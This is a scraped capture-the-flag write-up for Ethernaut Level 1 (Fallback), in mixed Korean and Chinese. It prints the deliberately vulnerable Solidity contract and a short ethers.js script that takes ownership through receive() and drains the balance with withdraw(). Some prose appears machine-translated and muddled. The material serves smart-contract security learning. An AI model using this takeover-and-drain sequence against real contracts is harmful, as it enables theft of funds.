Ethernaut 시스템-레벨 1(폴백)

7794 단어

레벨 1(대체):

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Fallback {

  using SafeMath for uint256;
  mapping(address => uint) public contributions;
  address payable public owner;

  constructor() public {
    owner = msg.sender;
    contributions[msg.sender] = 1000 * (1 ether);
  }

  modifier onlyOwner {
        require(
            msg.sender == owner,
            "caller is not the owner"
        );
        _;
    }

  function contribute() public payable {
    require(msg.value < 0.001 ether);
    contributions[msg.sender] += msg.value;
    if(contributions[msg.sender] > contributions[owner]) {
      owner = msg.sender;
    }
  }

  function getContribution() public view returns (uint) {
    return contributions[msg.sender];
  }

  function withdraw() public onlyOwner {
    owner.transfer(address(this).balance);
  }

  receive() external payable {
    require(msg.value > 0 && contributions[msg.sender] > 0);
    owner = msg.sender;
  }
}

通关要求

1.소유자 设为플레이어
2.合约的余额变为0

要点

熟悉合约调用和转账

解题思路

这关主要就是熟悉下web3如何调用写好的合约,故意的逻辑漏洞.
只要用js交互即可
1. 기여 기여()
2. 再调用转余额
3.채용withdraw()

test/01Fallback.js

  it("attacks", async function () {
    //调用合约的contribute方法
    await levelContract.connect(player).contribute({
      value: ethers.utils.parseEther("0.0001"),
    });
    //转账触发receive()，修改owner
    await player.sendTransaction({
      to: levelContract.address,
      value: ethers.utils.parseEther("0.0001"),
    });
    //取掉所有的余额
    await levelContract.connect(player).withdraw();
  });

Reference

이 문제에 관하여(Ethernaut 시스템-레벨 1(폴백)), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/bin2chen/ethernautxi-lie-level-1-pc5

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)

좋은 웹페이지 즐겨찾기

개발자 우수 사이트 수집

개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다